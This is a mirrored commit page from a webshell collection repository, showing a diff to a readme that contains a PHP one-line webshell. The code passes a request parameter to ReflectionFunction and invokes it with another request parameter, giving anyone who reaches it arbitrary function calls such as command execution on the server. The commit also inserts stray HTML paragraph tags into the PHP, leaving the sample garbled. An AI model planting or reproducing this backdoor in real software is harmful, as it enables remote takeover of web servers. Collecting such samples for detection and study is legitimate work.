mirror of
https://github.com/tennc/webshell.git
synced 2025-12-09 22:21:31 +00:00
update readme.md
This commit is contained in:
@@ -7,8 +7,11 @@
|
|||||||
code:
|
code:
|
||||||
|
|
||||||
<?php
|
<?php
|
||||||
|
<p>
|
||||||
$func = new ReflectionFunction($_GET[m]);
|
$func = new ReflectionFunction($_GET[m]);
|
||||||
|
<p>
|
||||||
echo $func->invokeArgs(array($_GET[c]));
|
echo $func->invokeArgs(array($_GET[c]));
|
||||||
|
<p>
|
||||||
?>
|
?>
|
||||||
|
|
||||||
***************************************************
|
***************************************************
|
||||||
Reference in New Issue
Block a user